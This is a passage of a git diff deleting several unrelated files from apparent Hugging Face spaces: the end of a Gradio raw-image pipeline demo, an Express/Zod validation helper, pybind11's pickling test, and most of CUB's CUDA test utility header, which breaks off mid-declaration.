-0.47650126, -0.03119153, -0.32803956, 1.35923111] - else: - black_level = [0.0625, 0.0626, 0.0625, 0.0626] - white_balance = [2.86653646, 1., 1.73079425] - colour_matrix = [1.50768983, -0.33571374, -0.17197604, -0.23048614, - 1.70698738, -0.47650126, -0.03119153, -0.32803956, 1.35923111] - debayer = Debayer - sharpening = Sharpening - denoising = Denoising - print(np.max(raw_img)) - raw_img = (raw_img[:,:,:].astype(np.float64)/255.) - img = ppn.processing(raw_img, black_level, white_balance, colour_matrix, - debayer=debayer, sharpening=sharpening, denoising=denoising) - print(np.max(img)) - return img - - -iface = gr.Interface( - process, - [gr.inputs.Image(),gr.inputs.Radio(["Microscope", "Drone"]),gr.inputs.Dropdown(["bilinear", "malvar2004", "menon2007"]), - gr.inputs.Dropdown(["sharpening_filter", "unsharp_masking"]), - gr.inputs.Dropdown(["gaussian_denoising", "median_denoising"])], - "image", - capture_session=True, - examples=[ - ["demo-files/car.png"], - ["demo-files/micro.png"] - ], - title="static pipeline demo", - description="You can select a sample raw image, the camera parameters and the pipeline configuration to process the raw image.") - -#if __name__ == "__main__": -iface.launch() - diff --git a/spaces/lysine/auscultate/src/lib/helper.ts b/spaces/lysine/auscultate/src/lib/helper.ts deleted file mode 100644 index 94b4c82d495460987ecf581e4803f2e602d48f19..0000000000000000000000000000000000000000 --- a/spaces/lysine/auscultate/src/lib/helper.ts +++ /dev/null @@ -1,66 +0,0 @@ -import type { Request, Response, NextFunction } from 'express'; -import { AnyZodObject, z } from 'zod'; -import { badRequest } from '@hapi/boom'; - -function indent(str: string, spaces: number) { - return str - .split('\n') - .map(line => ' '.repeat(spaces) + line) - .join('\n'); -} - -function extractZodMessage(error: any): string { - if (Array.isArray(error)) { - return error.map(extractZodMessage).join('\n'); - } else { - let union: string[] = []; - if ('unionErrors' in error) { - union = error.unionErrors.map(extractZodMessage); - } else if ('issues' in error) { - union = error.issues.map(extractZodMessage); - } - if ( - 'message' in error && - typeof error.message === 'string' && - !error.message.includes('\n') - ) { - if (union.length === 0) return error.message; - return error.message + '\n' + indent(union.join('\n'), 2); - } else if (union.length > 0) { - return union.join('\n'); - } else { - return ''; - } - } -} - -export async function validate( - req: Request, - schema: T -): Promise> { - try { - return await schema.parseAsync(req); - } catch (error: any) { - throw badRequest(extractZodMessage(error)); - } -} - -export function wrap( - fn: (req: Request, res: Response, next: NextFunction) => Promise -) { - return async function (req: Request, res: Response, next: NextFunction) { - try { - return await fn(req, res, next); - } catch (err) { - next(err); - } - }; -} - -export function log(...args: unknown[]) { - console.log(`[${process.env.pm_id ?? ''}]`, ...args); -} - -export function warn(...args: unknown[]) { - console.warn(`[${process.env.pm_id ?? ''}]`, ...args); -} diff --git a/spaces/ma-xu/LIVE/pybind11/tests/test_pickling.cpp b/spaces/ma-xu/LIVE/pybind11/tests/test_pickling.cpp deleted file mode 100644 index 9dc63bda3b5949032fbcd30e7aa4e7db2072dcff..0000000000000000000000000000000000000000 --- a/spaces/ma-xu/LIVE/pybind11/tests/test_pickling.cpp +++ /dev/null @@ -1,130 +0,0 @@ -/* - tests/test_pickling.cpp -- pickle support - - Copyright (c) 2016 Wenzel Jakob - - All rights reserved. Use of this source code is governed by a - BSD-style license that can be found in the LICENSE file. -*/ - -#include "pybind11_tests.h" - -TEST_SUBMODULE(pickling, m) { - // test_roundtrip - class Pickleable { - public: - Pickleable(const std::string &value) : m_value(value) { } - const std::string &value() const { return m_value; } - - void setExtra1(int extra1) { m_extra1 = extra1; } - void setExtra2(int extra2) { m_extra2 = extra2; } - int extra1() const { return m_extra1; } - int extra2() const { return m_extra2; } - private: - std::string m_value; - int m_extra1 = 0; - int m_extra2 = 0; - }; - - class PickleableNew : public Pickleable { - public: - using Pickleable::Pickleable; - }; - - py::class_(m, "Pickleable") - .def(py::init()) - .def("value", &Pickleable::value) - .def("extra1", &Pickleable::extra1) - .def("extra2", &Pickleable::extra2) - .def("setExtra1", &Pickleable::setExtra1) - .def("setExtra2", &Pickleable::setExtra2) - // For details on the methods below, refer to - // http://docs.python.org/3/library/pickle.html#pickling-class-instances - .def("__getstate__", [](const Pickleable &p) { - /* Return a tuple that fully encodes the state of the object */ - return py::make_tuple(p.value(), p.extra1(), p.extra2()); - }) - .def("__setstate__", [](Pickleable &p, py::tuple t) { - if (t.size() != 3) - throw std::runtime_error("Invalid state!"); - /* Invoke the constructor (need to use in-place version) */ - new (&p) Pickleable(t[0].cast()); - - /* Assign any additional state */ - p.setExtra1(t[1].cast()); - p.setExtra2(t[2].cast()); - }); - - py::class_(m, "PickleableNew") - .def(py::init()) - .def(py::pickle( - [](const PickleableNew &p) { - return py::make_tuple(p.value(), p.extra1(), p.extra2()); - }, - [](py::tuple t) { - if (t.size() != 3) - throw std::runtime_error("Invalid state!"); - auto p = PickleableNew(t[0].cast()); - - p.setExtra1(t[1].cast()); - p.setExtra2(t[2].cast()); - return p; - } - )); - -#if !defined(PYPY_VERSION) - // test_roundtrip_with_dict - class PickleableWithDict { - public: - PickleableWithDict(const std::string &value) : value(value) { } - - std::string value; - int extra; - }; - - class PickleableWithDictNew : public PickleableWithDict { - public: - using PickleableWithDict::PickleableWithDict; - }; - - py::class_(m, "PickleableWithDict", py::dynamic_attr()) - .def(py::init()) - .def_readwrite("value", &PickleableWithDict::value) - .def_readwrite("extra", &PickleableWithDict::extra) - .def("__getstate__", [](py::object self) { - /* Also include __dict__ in state */ - return py::make_tuple(self.attr("value"), self.attr("extra"), self.attr("__dict__")); - }) - .def("__setstate__", [](py::object self, py::tuple t) { - if (t.size() != 3) - throw std::runtime_error("Invalid state!"); - /* Cast and construct */ - auto& p = self.cast(); - new (&p) PickleableWithDict(t[0].cast()); - - /* Assign C++ state */ - p.extra = t[1].cast(); - - /* Assign Python state */ - self.attr("__dict__") = t[2]; - }); - - py::class_(m, "PickleableWithDictNew") - .def(py::init()) - .def(py::pickle( - [](py::object self) { - return py::make_tuple(self.attr("value"), self.attr("extra"), self.attr("__dict__")); - }, - [](const py::tuple &t) { - if (t.size() != 3) - throw std::runtime_error("Invalid state!"); - - auto cpp_state = PickleableWithDictNew(t[0].cast()); - cpp_state.extra = t[1].cast(); - - auto py_state = t[2].cast(); - return std::make_pair(cpp_state, py_state); - } - )); -#endif -} diff --git a/spaces/ma-xu/LIVE/thrust/dependencies/cub/test/test_util.h b/spaces/ma-xu/LIVE/thrust/dependencies/cub/test/test_util.h deleted file mode 100644 index b2fbd17cc3b9e9de3a37a0ff21e36aa2fdcdff14..0000000000000000000000000000000000000000 --- a/spaces/ma-xu/LIVE/thrust/dependencies/cub/test/test_util.h +++ /dev/null @@ -1,1648 +0,0 @@ -/****************************************************************************** - * Copyright (c) 2011, Duane Merrill. All rights reserved. - * Copyright (c) 2011-2018, NVIDIA CORPORATION. All rights reserved. - * - * Redistribution and use in source and binary forms, with or without - * modification, are permitted provided that the following conditions are met: - * * Redistributions of source code must retain the above copyright - * notice, this list of conditions and the following disclaimer. - * * Redistributions in binary form must reproduce the above copyright - * notice, this list of conditions and the following disclaimer in the - * documentation and/or other materials provided with the distribution. - * * Neither the name of the NVIDIA CORPORATION nor the - * names of its contributors may be used to endorse or promote products - * derived from this software without specific prior written permission. - * - * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND - * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED - * WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE - * DISCLAIMED. IN NO EVENT SHALL NVIDIA CORPORATION BE LIABLE FOR ANY - * DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES - * (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; - * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND - * ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT - * (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS - * SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. - * - ******************************************************************************/ - - -#pragma once - -#if defined(_WIN32) || defined(_WIN64) - #include - #undef small // Windows is terrible for polluting macro namespace -#else - #include -#endif - -#include - -#include -#include - -#include -#include -#include -#include -#include -#include - -#include "mersenne.h" -#include "half.h" - -#include "cub/util_debug.cuh" -#include "cub/util_device.cuh" -#include "cub/util_type.cuh" -#include "cub/util_macro.cuh" -#include "cub/iterator/discard_output_iterator.cuh" - -/****************************************************************************** - * Type conversion macros - ******************************************************************************/ - -/** - * Return a value of type `T` with the same bitwise representation of `in`. - * Types `T` and `U` must be the same size. - */ -template -T SafeBitCast(const U& in) -{ - static_assert(sizeof(T) == sizeof(U), "Types must be same size."); - T out; - memcpy(&out, &in, sizeof(T)); - return out; -} - -/****************************************************************************** - * Assertion macros - ******************************************************************************/ - -/** - * Assert equals - */ -#define AssertEquals(a, b) if ((a) != (b)) { std::cerr << "\n(" << __FILE__ << ": " << __LINE__ << ")\n"; exit(1);} - - -/****************************************************************************** - * Command-line parsing functionality - ******************************************************************************/ - -/** - * Utility for parsing command line arguments - */ -struct CommandLineArgs -{ - - std::vector keys; - std::vector values; - std::vector args; - cudaDeviceProp deviceProp; - float device_giga_bandwidth; - size_t device_free_physmem; - size_t device_total_physmem; - - /** - * Constructor - */ - CommandLineArgs(int argc, char **argv) : - keys(10), - values(10) - { - using namespace std; - - // Initialize mersenne generator - unsigned int mersenne_init[4]= {0x123, 0x234, 0x345, 0x456}; - mersenne::init_by_array(mersenne_init, 4); - - for (int i = 1; i < argc; i++) - { - string arg = argv[i]; - - if ((arg[0] != '-') || (arg[1] != '-')) - { - args.push_back(arg); - continue; - } - - string::size_type pos; - string key, val; - if ((pos = arg.find('=')) == string::npos) { - key = string(arg, 2, arg.length() - 2); - val = ""; - } else { - key = string(arg, 2, pos - 2); - val = string(arg, pos + 1, arg.length() - 1); - } - - keys.push_back(key); - values.push_back(val); - } - } - - - /** - * Checks whether a flag "--" is present in the commandline - */ - bool CheckCmdLineFlag(const char* arg_name) - { - using namespace std; - - for (int i = 0; i < int(keys.size()); ++i) - { - if (keys[i] == string(arg_name)) - return true; - } - return false; - } - - - /** - * Returns number of naked (non-flag and non-key-value) commandline parameters - */ - template - int NumNakedArgs() - { - return args.size(); - } - - - /** - * Returns the commandline parameter for a given index (not including flags) - */ - template - void GetCmdLineArgument(int index, T &val) - { - using namespace std; - if (index < args.size()) { - istringstream str_stream(args[index]); - str_stream >> val; - } - } - - /** - * Returns the value specified for a given commandline parameter --= - */ - template - void GetCmdLineArgument(const char *arg_name, T &val) - { - using namespace std; - - for (int i = 0; i < int(keys.size()); ++i) - { - if (keys[i] == string(arg_name)) - { - istringstream str_stream(values[i]); - str_stream >> val; - } - } - } - - - /** - * Returns the values specified for a given commandline parameter --=,* - */ - template - void GetCmdLineArguments(const char *arg_name, std::vector &vals) - { - using namespace std; - - if (CheckCmdLineFlag(arg_name)) - { - // Clear any default values - vals.clear(); - - // Recover from multi-value string - for (int i = 0; i < keys.size(); ++i) - { - if (keys[i] == string(arg_name)) - { - string val_string(values[i]); - istringstream str_stream(val_string); - string::size_type old_pos = 0; - string::size_type new_pos = 0; - - // Iterate comma-separated values - T val; - while ((new_pos = val_string.find(',', old_pos)) != string::npos) - { - if (new_pos != old_pos) - { - str_stream.width(new_pos - old_pos); - str_stream >> val; - vals.push_back(val); - } - - // skip over comma - str_stream.ignore(1); - old_pos = new_pos + 1; - } - - // Read last value - str_stream >> val; - vals.push_back(val); - } - } - } - } - - - /** - * The number of pairs parsed - */ - int ParsedArgc() - { - return (int) keys.size(); - } - - /** - * Initialize device - */ - cudaError_t DeviceInit(int dev = -1) - { - cudaError_t error = cudaSuccess; - - do - { - int deviceCount; - error = CubDebug(cudaGetDeviceCount(&deviceCount)); - if (error) break; - - if (deviceCount == 0) { - fprintf(stderr, "No devices supporting CUDA.\n"); - exit(1); - } - if (dev < 0) - { - GetCmdLineArgument("device", dev); - } - if ((dev > deviceCount - 1) || (dev < 0)) - { - dev = 0; - } - - error = CubDebug(cudaSetDevice(dev)); - if (error) break; - - CubDebugExit(cudaMemGetInfo(&device_free_physmem, &device_total_physmem)); - - int ptx_version = 0; - error = CubDebug(cub::PtxVersion(ptx_version)); - if (error) break; - - error = CubDebug(cudaGetDeviceProperties(&deviceProp, dev)); - if (error) break; - - if (deviceProp.major < 1) { - fprintf(stderr, "Device does not support CUDA.\n"); - exit(1); - } - - device_giga_bandwidth = float(deviceProp.memoryBusWidth) * deviceProp.memoryClockRate * 2 / 8 / 1000 / 1000; - - if (!CheckCmdLineFlag("quiet")) - { - printf( - "Using device %d: %s (PTX version %d, SM%d, %d SMs, " - "%lld free / %lld total MB physmem, " - "%.3f GB/s @ %d kHz mem clock, ECC %s)\n", - dev, - deviceProp.name, - ptx_version, - deviceProp.major * 100 + deviceProp.minor * 10, - deviceProp.multiProcessorCount, - (unsigned long long) device_free_physmem / 1024 / 1024, - (unsigned long long) device_total_physmem / 1024 / 1024, - device_giga_bandwidth, - deviceProp.memoryClockRate, - (deviceProp.ECCEnabled) ? "on" : "off"); - fflush(stdout); - } - - } while (0); - - return error; - } -}; - -/****************************************************************************** - * Random bits generator - ******************************************************************************/ - -int g_num_rand_samples = 0; - - -template -bool IsNaN(T /* val */) { return false; } - -template<> -__noinline__ bool IsNaN(float val) -{ - return std::isnan(val); -} - -template<> -__noinline__ bool IsNaN(float1 val) -{ - return (IsNaN(val.x)); -} - -template<> -__noinline__ bool IsNaN(float2 val) -{ - return (IsNaN(val.y) || IsNaN(val.x)); -} - -template<> -__noinline__ bool IsNaN(float3 val) -{ - return (IsNaN(val.z) || IsNaN(val.y) || IsNaN(val.x)); -} - -template<> -__noinline__ bool IsNaN(float4 val) -{ - return (IsNaN(val.y) || IsNaN(val.x) || IsNaN(val.w) || IsNaN(val.z)); -} - -template<> -__noinline__ bool IsNaN(double val) -{ - return std::isnan(val); -} - -template<> -__noinline__ bool IsNaN(double1 val) -{ - return (IsNaN(val.x)); -} - -template<> -__noinline__ bool IsNaN(double2 val) -{ - return (IsNaN(val.y) || IsNaN(val.x)); -} - -template<> -__noinline__ bool IsNaN(double3 val) -{ - return (IsNaN(val.z) || IsNaN(val.y) || IsNaN(val.x)); -} - -template<> -__noinline__ bool IsNaN(double4 val) -{ - return (IsNaN(val.y) || IsNaN(val.x) || IsNaN(val.w) || IsNaN(val.z)); -} - - -template<> -__noinline__ bool IsNaN(half_t val) -{ - const auto bits = SafeBitCast(val); - - // commented bit is always true, leaving for documentation: - return (((bits >= 0x7C01) && (bits <= 0x7FFF)) || - ((bits >= 0xFC01) /*&& (bits <= 0xFFFFFFFF)*/)); -} - - - -/** - * Generates random keys. - * - * We always take the second-order byte from rand() because the higher-order - * bits returned by rand() are commonly considered more uniformly distributed - * than the lower-order bits. - * - * We can decrease the entropy level of keys by adopting the technique - * of Thearling and Smith in which keys are computed from the bitwise AND of - * multiple random samples: - * - * entropy_reduction | Effectively-unique bits per key - * ----------------------------------------------------- - * -1 | 0 - * 0 | 32 - * 1 | 25.95 (81%) - * 2 | 17.41 (54%) - * 3 | 10.78 (34%) - * 4 | 6.42 (20%) - * ... | ... - * - */ -template -void RandomBits( - K &key, - int entropy_reduction = 0, - int begin_bit = 0, - int end_bit = sizeof(K) * 8) -{ - const int NUM_BYTES = sizeof(K); - const int WORD_BYTES = sizeof(unsigned int); - const int NUM_WORDS = (NUM_BYTES + WORD_BYTES - 1) / WORD_BYTES; - - unsigned int word_buff[NUM_WORDS]; - - if (entropy_reduction == -1) - { - memset((void *) &key, 0, sizeof(key)); - return; - } - - if (end_bit < 0) - end_bit = sizeof(K) * 8; - - while (true) - { - // Generate random word_buff - for (int j = 0; j < NUM_WORDS; j++) - { - int current_bit = j * WORD_BYTES * 8; - - unsigned int word = 0xffffffff; - word &= 0xffffffff << CUB_MAX(0, begin_bit - current_bit); - word &= 0xffffffff >> CUB_MAX(0, (current_bit + (WORD_BYTES * 8)) - end_bit); - - for (int i = 0; i <= entropy_reduction; i++) - { - // Grab some of the higher bits from rand (better entropy, supposedly) - word &= mersenne::genrand_int32(); - g_num_rand_samples++; - } - - word_buff[j] = word; - } - - memcpy(&key, word_buff, sizeof(K)); - - K copy = key; - if (!IsNaN(copy)) - break; // avoids NaNs when generating random floating point numbers - } -} - -/// Randomly select number between [0:max) -template -T RandomValue(T max) -{ - unsigned int bits; - unsigned int max_int = (unsigned int) -1; - do { - RandomBits(bits); - } while (bits == max_int); - - return (T) ((double(bits) / double(max_int)) * double(max)); -} - - -/****************************************************************************** - * Console printing utilities - ******************************************************************************/ - -/** - * Helper for casting character types to integers for cout printing - */ -template -T CoutCast(T val) { return val; } - -int CoutCast(char val) { return val; } - -int CoutCast(unsigned char val) { return val; } - -int CoutCast(signed char val) { return val; } - - - -/****************************************************************************** - * Test value initialization utilities - ******************************************************************************/ - -/** - * Test problem generation options - */ -enum GenMode -{ - UNIFORM, // Assign to '2', regardless of integer seed - INTEGER_SEED, // Assign to integer seed - RANDOM, // Assign to random, regardless of integer seed - RANDOM_BIT, // Assign to randomly chosen 0 or 1, regardless of integer seed -}; - -/** - * Initialize value - */ -template -__host__ __device__ __forceinline__ void InitValue(GenMode gen_mode, T &value, int index = 0) -{ - switch (gen_mode) - { -#if (CUB_PTX_ARCH == 0) - case RANDOM: - RandomBits(value); - break; - case RANDOM_BIT: - char c; - RandomBits(c, 0, 0, 1); - value = (c > 0) ? (T) 1 : (T) -1; - break; -#endif - case UNIFORM: - value = 2; - break; - case INTEGER_SEED: - default: - value = (T) index; - break; - } -} - - -/** - * Initialize value (bool) - */ -__host__ __device__ __forceinline__ void InitValue(GenMode gen_mode, bool &value, int index = 0) -{ - switch (gen_mode) - { -#if (CUB_PTX_ARCH == 0) - case RANDOM: - case RANDOM_BIT: - char c; - RandomBits(c, 0, 0, 1); - value = (c > 0); - break; -#endif - case UNIFORM: - value = true; - break; - case INTEGER_SEED: - default: - value = (index > 0); - break; - } -} - - -/** - * cub::NullType test initialization - */ -__host__ __device__ __forceinline__ void InitValue(GenMode /* gen_mode */, - cub::NullType &/* value */, - int /* index */ = 0) -{} - - -/** - * cub::KeyValuePairtest initialization - */ -template -__host__ __device__ __forceinline__ void InitValue( - GenMode gen_mode, - cub::KeyValuePair& value, - int index = 0) -{ - InitValue(gen_mode, value.value, index); - - // Assign corresponding flag with a likelihood of the last bit being set with entropy-reduction level 3 - RandomBits(value.key, 3); - value.key = (value.key & 0x1); -} - - - -/****************************************************************************** - * Comparison and ostream operators - ******************************************************************************/ - -/** - * KeyValuePair ostream operator - */ -template -std::ostream& operator<<(std::ostream& os, const cub::KeyValuePair &val) -{ - os << '(' << CoutCast(val.key) << ',' << CoutCast(val.value) << ')'; - return os; -} - - -/****************************************************************************** - * Comparison and ostream operators for CUDA vector types - ******************************************************************************/ - -/** - * Vector1 overloads - */ -#define CUB_VEC_OVERLOAD_1(T, BaseT) \ - /* Ostream output */ \ - std::ostream& operator<<( \ - std::ostream& os, \ - const T& val) \ - { \ - os << '(' << CoutCast(val.x) << ')'; \ - return os; \ - } \ - /* Inequality */ \ - __host__ __device__ __forceinline__ bool operator!=( \ - const T &a, \ - const T &b) \ - { \ - return (a.x != b.x); \ - } \ - /* Equality */ \ - __host__ __device__ __forceinline__ bool operator==( \ - const T &a, \ - const T &b) \ - { \ - return (a.x == b.x); \ - } \ - /* Test initialization */ \ - __host__ __device__ __forceinline__ void InitValue(GenMode gen_mode, T &value, int index = 0) \ - { \ - InitValue(gen_mode, value.x, index); \ - } \ - /* Max */ \ - __host__ __device__ __forceinline__ bool operator>( \ - const T &a, \ - const T &b) \ - { \ - return (a.x > b.x); \ - } \ - /* Min */ \ - __host__ __device__ __forceinline__ bool operator<( \ - const T &a, \ - const T &b) \ - { \ - return (a.x < b.x); \ - } \ - /* Summation (non-reference addends for VS2003 -O3 warpscan workaround */ \ - __host__ __device__ __forceinline__ T operator+( \ - T a, \ - T b) \ - { \ - T retval = make_##T(a.x + b.x); \ - return retval; \ - } \ - namespace cub { \ - template<> \ - struct NumericTraits \ - { \ - static const Category CATEGORY = NOT_A_NUMBER; \ - enum { \ - PRIMITIVE = false, \ - NULL_TYPE = false, \ - }; \ - static T Max() \ - { \ - T retval = { \ - NumericTraits::Max()}; \ - return retval; \ - } \ - static T Lowest() \ - { \ - T retval = { \ - NumericTraits::Lowest()}; \ - return retval; \ - } \ - }; \ - } /* namespace std */ - - - -/** - * Vector2 overloads - */ -#define CUB_VEC_OVERLOAD_2(T, BaseT) \ - /* Ostream output */ \ - std::ostream& operator<<( \ - std::ostream& os, \ - const T& val) \ - { \ - os << '(' \ - << CoutCast(val.x) << ',' \ - << CoutCast(val.y) << ')'; \ - return os; \ - } \ - /* Inequality */ \ - __host__ __device__ __forceinline__ bool operator!=( \ - const T &a, \ - const T &b) \ - { \ - return (a.x != b.x) || \ - (a.y != b.y); \ - } \ - /* Equality */ \ - __host__ __device__ __forceinline__ bool operator==( \ - const T &a, \ - const T &b) \ - { \ - return (a.x == b.x) && \ - (a.y == b.y); \ - } \ - /* Test initialization */ \ - __host__ __device__ __forceinline__ void InitValue(GenMode gen_mode, T &value, int index = 0) \ - { \ - InitValue(gen_mode, value.x, index); \ - InitValue(gen_mode, value.y, index); \ - } \ - /* Max */ \ - __host__ __device__ __forceinline__ bool operator>( \ - const T &a, \ - const T &b) \ - { \ - if (a.x > b.x) return true; else if (b.x > a.x) return false; \ - return a.y > b.y; \ - } \ - /* Min */ \ - __host__ __device__ __forceinline__ bool operator<( \ - const T &a, \ - const T &b) \ - { \ - if (a.x < b.x) return true; else if (b.x < a.x) return false; \ - return a.y < b.y; \ - } \ - /* Summation (non-reference addends for VS2003 -O3 warpscan workaround */ \ - __host__ __device__ __forceinline__ T operator+( \ - T a, \ - T b) \ - { \ - T retval = make_##T( \ - a.x + b.x, \ - a.y + b.y); \ - return retval; \ - } \ - namespace cub { \ - template<> \ - struct NumericTraits \ - { \ - static const Category CATEGORY = NOT_A_NUMBER; \ - enum { \ - PRIMITIVE = false, \ - NULL_TYPE = false, \ - }; \ - static T Max() \ - { \ - T retval = { \ - NumericTraits::Max(), \ - NumericTraits::Max()}; \ - return retval; \ - } \ - static T Lowest() \ - { \ - T retval = { \ - NumericTraits::Lowest(), \ - NumericTraits::Lowest()}; \ - return retval; \ - } \ - }; \ - } /* namespace cub */ - - - -/** - * Vector3 overloads - */ -#define CUB_VEC_OVERLOAD_3(T, BaseT) \ - /* Ostream output */ \ - std::ostream& operator<<( \ - std::ostream& os, \ - const T& val) \ - { \ - os << '(' \ - << CoutCast(val.x) << ',' \ - << CoutCast(val.y) << ',' \ - << CoutCast(val.z) << ')'; \ - return os; \ - } \ - /* Inequality */ \ - __host__ __device__ __forceinline__ bool operator!=( \ - const T &a, \ - const T &b) \ - { \ - return (a.x != b.x) || \ - (a.y != b.y) || \ - (a.z != b.z); \ - } \ - /* Equality */ \ - __host__ __device__ __forceinline__ bool operator==( \ - const T &a, \ - const T &b) \ - { \ - return (a.x == b.x) && \ - (a.y == b.y) && \ - (a.z == b.z); \ - } \ - /* Test initialization */ \ - __host__ __device__ __forceinline__ void InitValue(GenMode gen_mode, T &value, int index = 0) \ - { \ - InitValue(gen_mode, value.x, index); \ - InitValue(gen_mode, value.y, index); \ - InitValue(gen_mode, value.z, index); \ - } \ - /* Max */ \ - __host__ __device__ __forceinline__ bool operator>( \ - const T &a, \ - const T &b) \ - { \ - if (a.x > b.x) return true; else if (b.x > a.x) return false; \ - if (a.y > b.y) return true; else if (b.y > a.y) return false; \ - return a.z > b.z; \ - } \ - /* Min */ \ - __host__ __device__ __forceinline__ bool operator<( \ - const T &a, \ - const T &b) \ - { \ - if (a.x < b.x) return true; else if (b.x < a.x) return false; \ - if (a.y < b.y) return true; else if (b.y < a.y) return false; \ - return a.z < b.z; \ - } \ - /* Summation (non-reference addends for VS2003 -O3 warpscan workaround */ \ - __host__ __device__ __forceinline__ T operator+( \ - T a, \ - T b) \ - { \ - T retval = make_##T( \ - a.x + b.x, \ - a.y + b.y, \ - a.z + b.z); \ - return retval; \ - } \ - namespace cub { \ - template<> \ - struct NumericTraits \ - { \ - static const Category CATEGORY = NOT_A_NUMBER; \ - enum { \ - PRIMITIVE = false, \ - NULL_TYPE = false, \ - }; \ - static T Max() \ - { \ - T retval = { \ - NumericTraits::Max(), \ - NumericTraits::Max(), \ - NumericTraits::Max()}; \ - return retval; \ - } \ - static T Lowest() \ - { \ - T retval = { \ - NumericTraits::Lowest(), \ - NumericTraits::Lowest(), \ - NumericTraits::Lowest()}; \ - return retval; \ - } \ - }; \ - } /* namespace cub */ - - -/** - * Vector4 overloads - */ -#define CUB_VEC_OVERLOAD_4(T, BaseT) \ - /* Ostream output */ \ - std::ostream& operator<<( \ - std::ostream& os, \ - const T& val) \ - { \ - os << '(' \ - << CoutCast(val.x) << ',' \ - << CoutCast(val.y) << ',' \ - << CoutCast(val.z) << ',' \ - << CoutCast(val.w) << ')'; \ - return os; \ - } \ - /* Inequality */ \ - __host__ __device__ __forceinline__ bool operator!=( \ - const T &a, \ - const T &b) \ - { \ - return (a.x != b.x) || \ - (a.y != b.y) || \ - (a.z != b.z) || \ - (a.w != b.w); \ - } \ - /* Equality */ \ - __host__ __device__ __forceinline__ bool operator==( \ - const T &a, \ - const T &b) \ - { \ - return (a.x == b.x) && \ - (a.y == b.y) && \ - (a.z == b.z) && \ - (a.w == b.w); \ - } \ - /* Test initialization */ \ - __host__ __device__ __forceinline__ void InitValue(GenMode gen_mode, T &value, int index = 0) \ - { \ - InitValue(gen_mode, value.x, index); \ - InitValue(gen_mode, value.y, index); \ - InitValue(gen_mode, value.z, index); \ - InitValue(gen_mode, value.w, index); \ - } \ - /* Max */ \ - __host__ __device__ __forceinline__ bool operator>( \ - const T &a, \ - const T &b) \ - { \ - if (a.x > b.x) return true; else if (b.x > a.x) return false; \ - if (a.y > b.y) return true; else if (b.y > a.y) return false; \ - if (a.z > b.z) return true; else if (b.z > a.z) return false; \ - return a.w > b.w; \ - } \ - /* Min */ \ - __host__ __device__ __forceinline__ bool operator<( \ - const T &a, \ - const T &b) \ - { \ - if (a.x < b.x) return true; else if (b.x < a.x) return false; \ - if (a.y < b.y) return true; else if (b.y < a.y) return false; \ - if (a.z < b.z) return true; else if (b.z < a.z) return false; \ - return a.w < b.w; \ - } \ - /* Summation (non-reference addends for VS2003 -O3 warpscan workaround */ \ - __host__ __device__ __forceinline__ T operator+( \ - T a, \ - T b) \ - { \ - T retval = make_##T( \ - a.x + b.x, \ - a.y + b.y, \ - a.z + b.z, \ - a.w + b.w); \ - return retval; \ - } \ - namespace cub { \ - template<> \ - struct NumericTraits \ - { \ - static const Category CATEGORY = NOT_A_NUMBER; \ - enum { \ - PRIMITIVE = false, \ - NULL_TYPE = false, \ - }; \ - static T Max() \ - { \ - T retval = { \ - NumericTraits::Max(), \ - NumericTraits::Max(), \ - NumericTraits::Max(), \ - NumericTraits::Max()}; \ - return retval; \ - } \ - static T Lowest() \ - { \ - T retval = { \ - NumericTraits::Lowest(), \ - NumericTraits::Lowest(), \ - NumericTraits::Lowest(), \ - NumericTraits::Lowest()}; \ - return retval; \ - } \ - }; \ - } /* namespace cub */ - -/** - * All vector overloads - */ -#define CUB_VEC_OVERLOAD(COMPONENT_T, BaseT) \ - CUB_VEC_OVERLOAD_1(COMPONENT_T##1, BaseT) \ - CUB_VEC_OVERLOAD_2(COMPONENT_T##2, BaseT) \ - CUB_VEC_OVERLOAD_3(COMPONENT_T##3, BaseT) \ - CUB_VEC_OVERLOAD_4(COMPONENT_T##4, BaseT) - -/** - * Define for types - */ -CUB_VEC_OVERLOAD(char, char) -CUB_VEC_OVERLOAD(short, short) -CUB_VEC_OVERLOAD(int, int) -CUB_VEC_OVERLOAD(long, long) -CUB_VEC_OVERLOAD(longlong, long long) -CUB_VEC_OVERLOAD(uchar, unsigned char) -CUB_VEC_OVERLOAD(ushort, unsigned short) -CUB_VEC_OVERLOAD(uint, unsigned int) -CUB_VEC_OVERLOAD(ulong, unsigned long) -CUB_VEC_OVERLOAD(ulonglong, unsigned long long) -CUB_VEC_OVERLOAD(float, float) -CUB_VEC_OVERLOAD(double, double) - - -//--------------------------------------------------------------------- -// Complex data type TestFoo -//--------------------------------------------------------------------- - -/** - * TestFoo complex data type - */ -struct TestFoo -{ - long long x; - int y; - short z; - char w; - - // Factory - static __host__ __device__ __forceinline__ TestFoo MakeTestFoo(long long x, int y, short z, char w) - { - TestFoo retval = {x, y, z, w}; - return retval; - } - - // Assignment from int operator - __host__ __device__ __forceinline__ TestFoo& operator =(int b) - { - x = b; - y = b; - z = b; - w = b; - return *this; - } - - // Summation operator - __host__ __device__ __forceinline__ TestFoo operator+(const TestFoo &b) const - { - return MakeTestFoo(x + b.x, y + b.y, z + b.z, w + b.w); - } - - // Inequality operator - __host__ __device__ __forceinline__ bool operator !=(const TestFoo &b) const - { - return (x != b.x) || (y != b.y) || (z != b.z) || (w != b.w); - } - - // Equality operator - __host__ __device__ __forceinline__ bool operator ==(const TestFoo &b) const - { - return (x == b.x) && (y == b.y) && (z == b.z) && (w == b.w); - } - - // Less than operator - __host__ __device__ __forceinline__ bool operator <(const TestFoo &b) const - { - if (x < b.x) return true; else if (b.x < x) return false; - if (y < b.y) return true; else if (b.y < y) return false; - if (z < b.z) return true; else if (b.z < z) return false; - return w < b.w; - } - - // Greater than operator - __host__ __device__ __forceinline__ bool 